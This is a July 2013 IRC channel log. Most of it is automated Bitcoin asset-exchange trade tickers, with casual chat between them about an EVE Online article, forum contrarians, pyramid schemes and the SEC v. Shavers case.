[BTCTC] [ACTIVEMINING] 5 @ 0.008207 = 0.041 BTC [-] Jul 29 08:55:27 [BTCTC] [ACTIVEMINING] 100 @ 0.008205 = 0.8205 BTC [-] Jul 29 08:55:30 [BTCTC] [ACTIVEMINING] 250 @ 0.008204 = 2.051 BTC [-] Jul 29 08:55:33 [BTCTC] [ACTIVEMINING] 32 @ 0.008002 = 0.2561 BTC [-] Jul 29 08:55:34 [BTCTC] [ACTIVEMINING] 550 @ 0.008 = 4.4 BTC [-] Jul 29 09:03:55 [BTCTC] [BITVPS] 2 @ 0.0019 = 0.0038 BTC [-] Jul 29 09:10:39 [HAVELOCK] [AM100] 2 @ 0.0429478 = 0.0859 BTC [+] Jul 29 09:10:44 [BTCTC] [ACTIVEMINING] 25 @ 0.008008 = 0.2002 BTC [+] Jul 29 09:10:46 [BTCTC] [ACTIVEMINING] 50 @ 0.008007 = 0.4004 BTC [-] Jul 29 09:10:49 [BTCTC] [ACTIVEMINING] 20 @ 0.008005 = 0.1601 BTC [-] Jul 29 09:10:52 [BTCTC] [ACTIVEMINING] 7 @ 0.008002 = 0.056 BTC [-] Jul 29 09:10:57 [BTCTC] [ACTIVEMINING] 148 @ 0.008 = 1.184 BTC [-] Jul 29 09:13:07 [HAVELOCK] [SDSTM] 1 @ 0.008999 BTC [+] Jul 29 09:18:38 [BTCTC] [ACTIVEMINING] 50 @ 0.008388 = 0.4194 BTC [+] Jul 29 09:18:42 [BTCTC] [ACTIVEMINING] 25 @ 0.008389 = 0.2097 BTC [+] Jul 29 09:18:44 [BTCTC] [ACTIVEMINING] 12 @ 0.00839 = 0.1007 BTC [+] Jul 29 09:19:32 [BTCTC] [ASICMINER-PT] 1 @ 4.34 BTC [-] Jul 29 09:21:29 [BTCTC] [DMS.MINING] 1 @ 0.0118 BTC [+] Jul 29 09:22:45 [BTCTC] [TAT.MINIGAME] 70 @ 0.0003075 = 0.0215 BTC [+] Jul 29 09:24:46 [BTCTC] [DMS.MINING] 10 @ 0.0115 = 0.115 BTC [-] Jul 29 09:24:48 [BTCTC] [DMS.MINING] 30 @ 0.0114 = 0.342 BTC [-] Jul 29 09:24:50 [BTCTC] [DMS.MINING] 50 @ 0.01126 = 0.563 BTC [-] Jul 29 09:24:52 [BTCTC] [DMS.MINING] 2 @ 0.01113 = 0.0223 BTC [-] Jul 29 09:24:54 [BTCTC] [DMS.MINING] 3 @ 0.01113 = 0.0334 BTC [-] Jul 29 09:25:16 [BTCTC] [ASICMINER-PT] 1 @ 4.341 BTC [+] Jul 29 09:25:45 asciilifeform http://trilema.com/2013/eve-forums-deliver/ Jul 29 09:29:49 [BTCTC] [ACTIVEMINING] 25 @ 0.008485 = 0.2121 BTC [+] Jul 29 09:33:55 [BTCTC] [ACTIVEMINING] 275 @ 0.008485 = 2.3334 BTC [+] Jul 29 09:35:51 [BTCTC] [ACTIVEMINING] 25 @ 0.008486 = 0.2122 BTC [+] Jul 29 09:42:02 [BTCTC] [DMS.MINING] 7 @ 0.01113 = 0.0779 BTC [-] Jul 29 09:42:06 [BTCTC] [DMS.MINING] 15 @ 0.0111 = 0.1665 BTC [-] Jul 29 09:42:09 [BTCTC] [DMS.MINING] 100 @ 0.0111 = 1.11 BTC [-] Jul 29 09:42:18 [BTCTC] [DMS.MINING] 16 @ 0.011 = 0.176 BTC [-] Jul 29 09:43:40 [BTCTC] [TAT.MINIGAME] 2 @ 0.0003075 = 0.0006 BTC [+] Jul 29 09:45:58 [BTCTC] [ACTIVEMINING] 10 @ 0.00849 = 0.0849 BTC [+] Jul 29 09:46:55 [BTCTC] [ACTIVEMINING] 210 @ 0.008486 = 1.7821 BTC [-] Jul 29 09:50:58 How does balance sheet for ltc-atf work? Jul 29 09:51:00 [BTCTC] [TAT.ASICMINER] 16 @ 0.04288 = 0.6861 BTC [+] Jul 29 09:51:04 [BTCTC] [TAT.ASICMINER] 50 @ 0.04288 = 2.144 BTC [+] Jul 29 09:51:08 [BTCTC] [TAT.ASICMINER] 29 @ 0.04299 = 1.2467 BTC [+] Jul 29 09:51:11 [BTCTC] [TAT.ASICMINER] 55 @ 0.043 = 2.365 BTC [+] Jul 29 09:51:56 [BTCTC] [ASICMINER-PT] 10 @ 4.345 = 43.45 BTC [+] Jul 29 09:51:59 [BTCTC] [ASICMINER-PT] 1 @ 4.341 BTC [-] Jul 29 09:52:03 [BTCTC] [ASICMINER-PT] 1 @ 4.34 BTC [-] Jul 29 09:52:07 [BTCTC] [ASICMINER-PT] 1 @ 4.317 BTC [-] Jul 29 09:52:21 [BTCTC] [ASICMINER-PT] 1 @ 4.312 BTC [-] Jul 29 09:52:24 [BTCTC] [ASICMINER-PT] 1 @ 4.311 BTC [-] Jul 29 09:52:25 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [-] Jul 29 09:52:29 [BTCTC] [ASICMINER-PT] 1 @ 4.301 BTC [-] Jul 29 09:52:32 [BTCTC] [ASICMINER-PT] 1 @ 4.301 BTC [-] Jul 29 09:52:35 [BTCTC] [ASICMINER-PT] 1 @ 4.301 BTC [-] Jul 29 09:52:38 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 29 09:52:41 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 29 09:52:44 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [-] Jul 29 09:52:47 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 29 09:52:50 [BTCTC] [ASICMINER-PT] 1 @ 4.291 BTC [-] Jul 29 09:52:53 [BTCTC] [ASICMINER-PT] 3 @ 4.29 = 12.87 BTC [-] Jul 29 09:52:56 [BTCTC] [ASICMINER-PT] 3 @ 4.29 = 12.87 BTC [-] Jul 29 09:53:48 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 29 09:53:52 [BTCTC] [ASICMINER-PT] 3 @ 4.25 = 12.75 BTC [-] Jul 29 09:53:55 [BTCTC] [ASICMINER-PT] 1 @ 4.224 BTC [-] Jul 29 09:53:58 [BTCTC] [ASICMINER-PT] 2 @ 4.224 = 8.448 BTC [-] Jul 29 09:54:01 [BTCTC] [ASICMINER-PT] 1 @ 4.223 BTC [-] Jul 29 09:54:05 [BTCTC] [ASICMINER-PT] 4 @ 4.223 = 16.892 BTC [-] Jul 29 09:54:09 [BTCTC] [ASICMINER-PT] 1 @ 4.222 BTC [-] Jul 29 09:54:21 [BTCTC] [ASICMINER-PT] 2 @ 4.221 = 8.442 BTC [-] Jul 29 09:57:32 [BTCTC] [ACTIVEMINING] 2 @ 0.008439 = 0.0169 BTC [-] Jul 29 10:03:59 [BTCTC] [ACTIVEMINING] 25 @ 0.008437 = 0.2109 BTC [-] Jul 29 10:04:32 [BTCTC] [ASICMINER-PT] 4 @ 4.349 = 17.396 BTC [+] Jul 29 10:04:34 [HAVELOCK] [AM100] 2 @ 0.0411 = 0.0822 BTC [-] Jul 29 10:04:36 [HAVELOCK] [AM100] 1 @ 0.0411 BTC [-] Jul 29 10:05:00 [MPEX] [S.MPOE] 1100 @ 0.00081091 = 0.892 BTC [-] Jul 29 10:05:11 [HAVELOCK] [AM100] 4 @ 0.041001 = 0.164 BTC [-] Jul 29 10:05:20 [BTCTC] [ASICMINER-PT] 4 @ 4.348 = 17.392 BTC [-] Jul 29 10:06:00 [BTCTC] [ACTIVEMINING] 25 @ 0.008436 = 0.2109 BTC [-] Jul 29 10:08:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jul 29 10:09:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.043 = 0.086 BTC [+] Jul 29 10:12:05 [BTCTC] [DMS.MINING] 2 @ 0.0117 = 0.0234 BTC [+] Jul 29 10:12:37 [BTCTC] [DMS.MINING] 2 @ 0.0118 = 0.0236 BTC [+] Jul 29 10:13:30 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003015 BTC [+] Jul 29 10:18:32 [BTCTC] [ACTIVEMINING] 606 @ 0.008396 = 5.088 BTC [-] Jul 29 10:18:50 [BTCTC] [ACTIVEMINING] 50 @ 0.008396 = 0.4198 BTC [-] Jul 29 10:18:55 [BTCTC] [ACTIVEMINING] 3200 @ 0.008396 = 26.8672 BTC [-] Jul 29 10:18:57 [BTCTC] [ACTIVEMINING] 50 @ 0.008254 = 0.4127 BTC [-] Jul 29 10:18:59 [BTCTC] [ACTIVEMINING] 537 @ 0.008252 = 4.4313 BTC [-] Jul 29 10:19:08 [BTCTC] [ACTIVEMINING] 9 @ 0.008399 = 0.0756 BTC [+] Jul 29 10:23:45 [BTCTC] [ACTIVEMINING] 20 @ 0.008397 = 0.1679 BTC [-] Jul 29 10:29:56 [BTCTC] [ACTIVEMINING] 10 @ 0.0083 = 0.083 BTC [-] Jul 29 10:40:31 [BTCTC] [ACTIVEMINING] 25 @ 0.008275 = 0.2069 BTC [-] Jul 29 10:40:41 [BTCTC] [ACTIVEMINING] 50 @ 0.008274 = 0.4137 BTC [-] Jul 29 10:40:51 [BTCTC] [ACTIVEMINING] 276 @ 0.008263 = 2.2806 BTC [-] Jul 29 10:40:54 [BTCTC] [ACTIVEMINING] 3 @ 0.008262 = 0.0248 BTC [-] Jul 29 10:40:56 [BTCTC] [ACTIVEMINING] 646 @ 0.008258 = 5.3347 BTC [-] Jul 29 10:42:27 [BTCTC] [DMS.SELLING] 25 @ 0.021 = 0.525 BTC [+] Jul 29 10:49:18 [BTCTC] [BASIC-MINING] 1 @ 0.5404 BTC [+] Jul 29 10:51:04 [BTCTC] [ACTIVEMINING] 1 @ 0.008275 BTC [+] Jul 29 10:51:20 [BTCTC] [ACTIVEMINING] 1 @ 0.008258 BTC [-] Jul 29 10:51:30 [BTCTC] [ACTIVEMINING] 25 @ 0.008259 = 0.2065 BTC [+] Jul 29 10:51:32 [BTCTC] [ACTIVEMINING] 50 @ 0.008258 = 0.4129 BTC [-] Jul 29 10:51:44 [BTCTC] [ACTIVEMINING] 25 @ 0.008259 = 0.2065 BTC [+] Jul 29 10:51:46 [BTCTC] [ACTIVEMINING] 407 @ 0.008258 = 3.361 BTC [-] Jul 29 10:51:47 [BTCTC] [ACTIVEMINING] 2500 @ 0.00825 = 20.625 BTC [-] Jul 29 11:02:53 [BTCTC] [DMS.SELLING] 3 @ 0.02011 = 0.0603 BTC [-] Jul 29 11:04:52 [BTCTC] [ACTIVEMINING] 7 @ 0.008299 = 0.0581 BTC [+] Jul 29 11:05:18 [BTCTC] [ACTIVEMINING] 25 @ 0.008289 = 0.2072 BTC [-] Jul 29 11:05:20 ok i've just been testing the s.mg game client. it's definitely going to be out this month. Jul 29 11:05:24 super alpha but still. Jul 29 11:05:56 [BTCTC] [DMS.SELLING] 120 @ 0.02146 = 2.5752 BTC [+] Jul 29 11:10:46 [BTCTC] [ACTIVEMINING] 15 @ 0.007811 = 0.1172 BTC [-] Jul 29 11:11:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.04343 BTC [+] Jul 29 11:11:58 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003079 BTC [+] Jul 29 11:12:45 [BTCTC] [ACTIVEMINING] 25 @ 0.008097 = 0.2024 BTC [+] Jul 29 11:14:43 [BTCTC] [ACTIVEMINING] 25 @ 0.007815 = 0.1954 BTC [-] Jul 29 11:14:46 [BTCTC] [ACTIVEMINING] 15 @ 0.007814 = 0.1172 BTC [-] Jul 29 11:14:48 [BTCTC] [KENILWORTH] 1 @ 0.001798 BTC [+] Jul 29 11:14:49 [BTCTC] [ACTIVEMINING] 5 @ 0.007812 = 0.0391 BTC [-] Jul 29 11:16:41 nice Jul 29 11:16:48 looking forward to testing it :) Jul 29 11:17:06 [BTCTC] [ACTIVEMINING] 25 @ 0.007808 = 0.1952 BTC [-] Jul 29 11:17:13 [BTCTC] [ACTIVEMINING] 142 @ 0.007807 = 1.1086 BTC [-] Jul 29 11:17:54 :D Jul 29 11:20:25 [BTCTC] [ACTIVEMINING] 25 @ 0.007809 = 0.1952 BTC [+] Jul 29 11:20:35 [BTCTC] [ACTIVEMINING] 10 @ 0.007808 = 0.0781 BTC [-] Jul 29 11:20:38 [BTCTC] [ACTIVEMINING] 15 @ 0.007804 = 0.1171 BTC [-] Jul 29 11:23:07 [BTCTC] [COGNITIVE] 2 @ 0.55 = 1.1 BTC [-] Jul 29 11:23:10 [BTCTC] [COGNITIVE] 4 @ 0.55 = 2.2 BTC [-] Jul 29 11:23:40 [BTCTC] [KENILWORTH] 4 @ 0.001799 = 0.0072 BTC [+] Jul 29 11:25:29 [HAVELOCK] [HIM] 5 @ 0.1861 = 0.9305 BTC [-] Jul 29 11:25:35 [HAVELOCK] [HIM] 1 @ 0.1859 BTC [-] Jul 29 11:25:36 interesting article about EVE Jul 29 11:25:40 [HAVELOCK] [HIM] 1 @ 0.182 BTC [-] Jul 29 11:25:48 [HAVELOCK] [HIM] 6 @ 0.18000003 = 1.08 BTC [-] Jul 29 11:25:56 [HAVELOCK] [HIM] 15 @ 0.18000002 = 2.7 BTC [-] Jul 29 11:26:04 [HAVELOCK] [HIM] 50 @ 0.18 = 9 BTC [-] Jul 29 11:26:11 whoch one ? Jul 29 11:26:33 [BTCTC] [ACTIVEMINING] 25 @ 0.007989 = 0.1997 BTC [+] Jul 29 11:26:35 [BTCTC] [ACTIVEMINING] 12 @ 0.00799 = 0.0959 BTC [+] Jul 29 11:26:37 [BTCTC] [ACTIVEMINING] 50 @ 0.007992 = 0.3996 BTC [+] Jul 29 11:26:47 the one about libertard Jul 29 11:26:51 a a Jul 29 11:26:57 not just about eve :) Jul 29 11:26:59 made me want to play EVE Jul 29 11:27:05 that guy could well be on bitcointalk Jul 29 11:27:07 well yes, but using EVE as an example Jul 29 11:27:15 those guys ARE on bitcointalk Jul 29 11:27:16 if you do, we got a bitcoin corp Jul 29 11:27:21 great point Jul 29 11:28:37 [HAVELOCK] [HIM] 1 @ 0.1999999 BTC [+] Jul 29 11:31:40 [BTCTC] [ACTIVEMINING] 25 @ 0.008201 = 0.205 BTC [+] Jul 29 11:32:21 [BTCTC] [ACTIVEMINING] 27 @ 0.0082 = 0.2214 BTC [-] Jul 29 11:33:39 ugh Jul 29 11:33:45 i get sick of interacting with people Jul 29 11:33:55 have to retreat back to #bitcoin-assets Jul 29 11:34:13 lol Jul 29 11:34:24 people who say things like "i think it's the sort of pyramid scheme where..." Jul 29 11:34:32 there are not multiple types... Jul 29 11:34:46 there is one type, paying new investors with the money from old investors Jul 29 11:35:08 that is what drives me crazy...words mean things, but people think they can make words mean anything convenient\ Jul 29 11:35:27 [BTCTC] [ACTIVEMINING] 50 @ 0.007992 = 0.3996 BTC [-] Jul 29 11:35:38 [BTCTC] [ACTIVEMINING] 13 @ 0.007991 = 0.1039 BTC [-] Jul 29 11:35:51 [BTCTC] [ACTIVEMINING] 26 @ 0.00799 = 0.2077 BTC [-] Jul 29 11:36:34 myeah Jul 29 11:36:43 it's the sort of pyramid that's a cube. Jul 29 11:38:44 exactly Jul 29 11:38:56 usually followed by "you know what I meant" Jul 29 11:39:02 Cubic pyramid is a pyramid where instead of all funds being redirected toward the founder at the top, the funds are redirected to 8 co-conspirators that cornered a group in the middle and sucking it dry. Jul 29 11:39:18 f̶a̶c̶t̶ made up stuff Jul 29 11:39:22 urgh Jul 29 11:39:25 very nice Jul 29 11:39:37 but i think that post really does sum it up Jul 29 11:39:43 achievement doesn't matter, attention matters Jul 29 11:39:50 stupid strikethrough doesn't work in here Jul 29 11:39:53 which is what annoys the hell out of me Jul 29 11:40:02 mjr_ you only think so because you're in a leet corp and have max btc Jul 29 11:40:16 because every fucking person usually feels they can do this: Jul 29 11:40:16 also 10 tits Jul 29 11:40:33 "well, I don't think that will work because X" Jul 29 11:40:45 because usually just saying "hey, good idea...best of luck" Jul 29 11:40:50 won't garner you much attention Jul 29 11:41:02 [MPEX] [S.MPOE] 10600 @ 0.00081241 = 8.6115 BTC [+] Jul 29 11:41:07 but being contrarian, finding fault, or saying that you would do it in a better way, DOES get you attention Jul 29 11:41:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.04392 BTC [+] Jul 29 11:41:25 see me and Gweedo's exchange for an example Jul 29 11:41:42 I try to tell people "this is happening now, its growing and spreading, and we like it" Jul 29 11:41:52 and they say "that won't work" Jul 29 11:42:14 welcome to bitcoin. Jul 29 11:42:18 yep Jul 29 11:42:20 What? Saying "Y won't work because X" in the other channels is premium entertainment. Jul 29 11:42:27 I do it all the time. Jul 29 11:42:30 hehehe Jul 29 11:42:42 Or post musics/images as a comment Jul 29 11:42:42 Namworld yes but it doesn't work because califlower. Jul 29 11:42:45 yay, for me going to a conference Jul 29 11:42:49 this is the key Jul 29 11:43:14 attention will be showered on people who have accomplished EXACTLY (to a precision of ten decimal places) nothing Jul 29 11:43:26 but they will say "I think this, or I think that" Jul 29 11:43:50 You could encourage them or disagree with them, wouldn't change a thing, their mind is already set. Even if they ask if they made good decision, they'll lash back at critics and compliment those approving them as smart. Jul 29 11:43:57 I can count on one hand the people who I really want to hear talk about bitcoin related things Jul 29 11:44:05 (that is up to 31, in case you were curious) Jul 29 11:44:59 i'm going to go have a cigarette... Jul 29 11:45:07 you think forums are bad... Jul 29 11:45:14 go to comments on mainstream publications... Jul 29 11:45:41 imagine people who say "bitcoins will be worthless, because you can just make more of them whenever you want" Jul 29 11:45:46 x1000 Jul 29 11:46:02 Comments? I thought those were parodies. Publications always have entertainment/comics sections. Jul 29 11:47:12 [BTCTC] [ACTIVEMINING] 45 @ 0.0079 = 0.3555 BTC [-] Jul 29 11:50:29 [BTCTC] [ACTIVEMINING] 25 @ 0.007999 = 0.2 BTC [+] Jul 29 11:51:22 [BTCTC] [ACTIVEMINING] 25 @ 0.007999 = 0.2 BTC [+] Jul 29 11:52:32 [BTCTC] [ACTIVEMINING] 25 @ 0.007997 = 0.1999 BTC [-] Jul 29 11:54:08 [BTCTC] [ASICMINER-PT] 1 @ 4.274 BTC [-] Jul 29 11:54:15 [BTCTC] [ASICMINER-PT] 8 @ 4.27 = 34.16 BTC [-] Jul 29 11:54:18 [BTCTC] [ASICMINER-PT] 1 @ 4.22 BTC [-] Jul 29 11:54:21 [BTCTC] [ACTIVEMINING] 25 @ 0.007995 = 0.1999 BTC [-] Jul 29 11:54:23 [BTCTC] [ASICMINER-PT] 3 @ 4.214 = 12.642 BTC [-] Jul 29 11:54:25 [BTCTC] [ASICMINER-PT] 6 @ 4.213 = 25.278 BTC [-] Jul 29 11:54:28 [BTCTC] [ASICMINER-PT] 1 @ 4.211 BTC [-] Jul 29 11:54:30 [BTCTC] [ASICMINER-PT] 1 @ 4.211 BTC [-] Jul 29 11:54:34 [BTCTC] [ASICMINER-PT] 2 @ 4.211 = 8.422 BTC [-] Jul 29 11:54:36 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 29 11:54:39 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 29 11:54:41 [BTCTC] [ASICMINER-PT] 18 @ 4.21 = 75.78 BTC [-] Jul 29 11:54:45 [BTCTC] [ASICMINER-PT] 3 @ 4.2 = 12.6 BTC [-] Jul 29 11:54:47 [BTCTC] [ASICMINER-PT] 4 @ 4.2 = 16.8 BTC [-] Jul 29 11:54:49 [BTCTC] [ASICMINER-PT] 6 @ 4.2 = 25.2 BTC [-] Jul 29 11:54:51 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 29 11:54:54 [BTCTC] [ASICMINER-PT] 2 @ 4.2 = 8.4 BTC [-] Jul 29 11:55:23 [BTCTC] [ACTIVEMINING] 12 @ 0.007996 = 0.096 BTC [+] Jul 29 11:56:28 [BTCTC] [ACTIVEMINING] 50 @ 0.007995 = 0.3998 BTC [-] Jul 29 11:56:29 [BTCTC] [ACTIVEMINING] 80 @ 0.007996 = 0.6397 BTC [+] Jul 29 11:57:07 [BTCTC] [ACTIVEMINING] 25 @ 0.007867 = 0.1967 BTC [-] Jul 29 11:57:16 [BTCTC] [ACTIVEMINING] 22 @ 0.007866 = 0.1731 BTC [-] Jul 29 11:57:19 [BTCTC] [ACTIVEMINING] 20 @ 0.007864 = 0.1573 BTC [-] Jul 29 11:57:58 [BTCTC] [ACTIVEMINING] 25 @ 0.007997 = 0.1999 BTC [+] Jul 29 11:58:10 [BTCTC] [ACTIVEMINING] 45 @ 0.007998 = 0.3599 BTC [+] Jul 29 11:58:34 [BTCTC] [ACTIVEMINING] 25 @ 0.007867 = 0.1967 BTC [-] Jul 29 11:58:36 [BTCTC] [ACTIVEMINING] 27 @ 0.007998 = 0.2159 BTC [+] Jul 29 11:58:39 [BTCTC] [ACTIVEMINING] 100 @ 0.007998 = 0.7998 BTC [+] Jul 29 11:59:36 [BTCTC] [ACTIVEMINING] 1 @ 0.007999 BTC [+] Jul 29 12:00:36 [BTCTC] [ACTIVEMINING] 1 @ 0.007999 BTC [+] Jul 29 12:00:52 [BTCTC] [GSDPT] 14 @ 0.003353 = 0.0469 BTC [-] Jul 29 12:01:29 [BTCTC] [ACTIVEMINING] 25 @ 0.00787 = 0.1968 BTC [-] Jul 29 12:01:31 [BTCTC] [ACTIVEMINING] 87 @ 0.007869 = 0.6846 BTC [-] Jul 29 12:01:33 [BTCTC] [ACTIVEMINING] 1 @ 0.007867 BTC [-] Jul 29 12:01:35 [BTCTC] [ACTIVEMINING] 148 @ 0.007862 = 1.1636 BTC [-] Jul 29 12:01:37 [BTCTC] [ACTIVEMINING] 328 @ 0.007805 = 2.56 BTC [-] Jul 29 12:01:39 [BTCTC] [ACTIVEMINING] 85 @ 0.007804 = 0.6633 BTC [-] Jul 29 12:01:41 [BTCTC] [ACTIVEMINING] 180 @ 0.007804 = 1.4047 BTC [-] Jul 29 12:01:43 [BTCTC] [ACTIVEMINING] 50 @ 0.0078 = 0.39 BTC [-] Jul 29 12:01:45 [BTCTC] [ACTIVEMINING] 1000 @ 0.0078 = 7.8 BTC [-] Jul 29 12:01:46 [BTCTC] [ACTIVEMINING] 292 @ 0.007753 = 2.2639 BTC [-] Jul 29 12:01:49 [BTCTC] [ACTIVEMINING] 228 @ 0.007752 = 1.7675 BTC [-] Jul 29 12:02:04 [BTCTC] [S.MPOE-PT] 3 @ 0.0009457 = 0.0028 BTC [+] Jul 29 12:04:19 [BTCTC] [ACTIVEMINING] 25 @ 0.007871 = 0.1968 BTC [+] Jul 29 12:05:52 [BTCTC] [ACTIVEMINING] 25 @ 0.007755 = 0.1939 BTC [-] Jul 29 12:05:54 [BTCTC] [ACTIVEMINING] 50 @ 0.007754 = 0.3877 BTC [-] Jul 29 12:05:56 [BTCTC] [ACTIVEMINING] 30 @ 0.007752 = 0.2326 BTC [-] Jul 29 12:07:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.04324 BTC [-] Jul 29 12:07:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.04321 BTC [-] Jul 29 12:07:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.0432 = 0.432 BTC [-] Jul 29 12:07:41 [BTCTC] [TAT.ASICMINER] 12 @ 0.043 = 0.516 BTC [-] Jul 29 12:08:19 [BTCTC] [ASICMINER-PT] 1 @ 4.299 BTC [+] Jul 29 12:10:25 [BTCTC] [ACTIVEMINING] 3 @ 0.00799 = 0.024 BTC [+] Jul 29 12:11:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.04275 BTC [-] Jul 29 12:11:28 [BTCTC] [TAT.ASICMINER] 14 @ 0.04275 = 0.5985 BTC [-] Jul 29 12:12:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.04386 = 0.1754 BTC [+] Jul 29 12:15:45 [BTCTC] [ACTIVEMINING] 22 @ 0.007949 = 0.1749 BTC [-] **** BEGIN LOGGING AT Mon Jul 29 18:15:41 2013 Jul 29 18:16:30 [BTCTC] [ACTIVEMINING] 32 @ 0.00832 = 0.2662 BTC [-] Jul 29 18:16:32 [BTCTC] [ACTIVEMINING] 87 @ 0.008638 = 0.7515 BTC [+] Jul 29 18:16:34 [BTCTC] [ACTIVEMINING] 70 @ 0.008639 = 0.6047 BTC [+] Jul 29 18:16:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.04222 = 0.4222 BTC [-] Jul 29 18:16:36 [BTCTC] [ACTIVEMINING] 372 @ 0.00864 = 3.2141 BTC [+] Jul 29 18:16:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.04221 BTC [-] Jul 29 18:16:39 [BTCTC] [ACTIVEMINING] 151 @ 0.008646 = 1.3055 BTC [+] Jul 29 18:16:40 Case docket: Securities and Exchange Commission v. Shavers et al Jul 29 18:16:43 [BTCTC] [ACTIVEMINING] 52 @ 0.008647 = 0.4496 BTC [+] Jul 29 18:16:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.0422 = 0.1688 BTC [-] Jul 29 18:16:47 [BTCTC] [ACTIVEMINING] 250 @ 0.008649 = 2.1623 BTC [+] Jul 29 18:16:49 [BTCTC] [TAT.ASICMINER] 17 @ 0.0422 = 0.7174 BTC [-] Jul 29 18:16:50 [BTCTC] [ACTIVEMINING] 125 @ 0.008698 = 1.0873 BTC [+] Jul 29 18:16:56 [BTCTC] [TAT.ASICMINER] 33 @ 0.04216 = 1.3913 BTC [-] Jul 29 18:16:57 [BTCTC] [ACTIVEMINING] 250 @ 0.008699 = 2.1748 BTC [+] Jul 29 18:16:59 [BTCTC] [ACTIVEMINING] 125 @ 0.008743 = 1.0929 BTC [+] Jul 29 18:17:01 [BTCTC] [ACTIVEMINING] 250 @ 0.008744 = 2.186 BTC [+] Jul 29 18:17:04 [BTCTC] [ACTIVEMINING] 150 @ 0.008799 = 1.3199 BTC [+] Jul 29 18:17:07 [BTCTC] [ACTIVEMINING] 300 @ 0.0088 = 2.64 BTC [+] Jul 29 18:17:08 [BTCTC] [TAT.MINIGAME] 1 @ 0.000306 BTC [+] Jul 29 18:17:11 [BTCTC] [ACTIVEMINING] 101 @ 0.008847 = 0.8935 BTC [+] Jul 29 18:17:12 [BTCTC] [TAT.MINIGAME] 32 @ 0.0003074 = 0.0098 BTC [+] Jul 29 18:17:15 [BTCTC] [ACTIVEMINING] 500 @ 0.008848 = 4.424 BTC [+] Jul 29 18:17:18 [BTCTC] [ACTIVEMINING] 110 @ 0.00885 = 0.9735 BTC [+] Jul 29 18:17:18 Chaang-Noi: Ah, I missed the links. I just thought "what a bore" and skipped that. Jul 29 18:17:20 hmmm Jul 29 18:17:20 [BTCTC] [ACTIVEMINING] 223 @ 0.008898 = 1.9843 BTC [+] Jul 29 18:17:22 [BTCTC] [ACTIVEMINING] 550 @ 0.008899 = 4.8945 BTC [+] Jul 29 18:17:24 [BTCTC] [ACTIVEMINING] 345 @ 0.0089 = 3.0705 BTC [+] Jul 29 18:17:27 [BTCTC] [ACTIVEMINING] 657 @ 0.008998 = 5.9117 BTC [+] Jul 29 18:18:06 Those underlined single digits that are so obvious, yaknow. Jul 29 18:18:39 Wow, I have a long reading list Jul 29 18:19:28 [HAVELOCK] [AM100] 8 @ 0.04248 = 0.3398 BTC [-] Jul 29 18:19:28 Well I hope they take his freedom for a few years at least. Jul 29 18:19:38 [HAVELOCK] [AM100] 2 @ 0.04249 = 0.085 BTC [+] Jul 29 18:19:48 [BTCTC] [DMS.PURCHASE] 50 @ 0.03366 = 1.683 BTC [+] Jul 29 18:20:42 i'm going through his bank statemtns now Jul 29 18:20:45 Official recognition of BTC as mark meaning Bitcoin. Fuck all the XBT shit. Jul 29 18:20:46 thanks Jul 29 18:21:14 Not that official recognition means jack of course Jul 29 18:21:35 [BTCTC] [COGNITIVE] 1 @ 0.55 BTC [+] Jul 29 18:22:41 Neil_ the standardisation battle is quite far from over. Jul 29 18:22:47 XBT dun wanna die Jul 29 18:23:03 [HAVELOCK] [AM100] 10 @ 0.042 = 0.42 BTC [-] Jul 29 18:23:09 [HAVELOCK] [AM100] 12 @ 0.041615 = 0.4994 BTC [-] Jul 29 18:23:14 [HAVELOCK] [AM100] 3 @ 0.0416 = 0.1248 BTC [-] Jul 29 18:23:21 [HAVELOCK] [AM100] 2 @ 0.0415 = 0.083 BTC [-] Jul 29 18:24:13 el PDF seems to support my claim "but realizing net proceeds of $164,758 from his net sales of 86,202 BTC" Jul 29 18:24:19 About $2 each, even less. Jul 29 18:24:25 What a donkey. Jul 29 18:24:48 uyeah. Jul 29 18:25:03 If people use BTC, that's all that matters. Jul 29 18:27:21 [HAVELOCK] [AM100] 18 @ 0.0412001 = 0.7416 BTC [-] Jul 29 18:28:19 [HAVELOCK] [AM100] 8 @ 0.04249 = 0.3399 BTC [+] Jul 29 18:29:01 [HAVELOCK] [HIM] 1 @ 0.1998 BTC [-] Jul 29 18:29:03 Hehe, SEC uses SHA1 hashes. Jul 29 18:29:12 I guess the good ideas get around. Jul 29 18:29:20 [BTCTC] [TAT.ASICMINER] 17 @ 0.04261 = 0.7244 BTC [+] Jul 29 18:29:22 [BTCTC] [TAT.ASICMINER] 50 @ 0.04262 = 2.131 BTC [+] Jul 29 18:29:24 [BTCTC] [TAT.ASICMINER] 9 @ 0.04263 = 0.3837 BTC [+] Jul 29 18:30:52 i found my account Jul 29 18:31:01 facedesk Jul 29 18:32:29 [HAVELOCK] [AM100] 142 @ 0.04249 = 6.0336 BTC [+] Jul 29 18:32:52 [HAVELOCK] [AM100] 5 @ 0.0413 = 0.2065 BTC [-] Jul 29 18:32:59 now i realize each page is labelled at the bottom by username Jul 29 18:33:09 [HAVELOCK] [AM100] 3 @ 0.0413 = 0.1239 BTC [-] Jul 29 18:34:00 [BTCTC] [BFMINES] 90 @ 0.003281 = 0.2953 BTC [-] Jul 29 18:34:50 [BTCTC] [ACTIVEMINING] 25 @ 0.008992 = 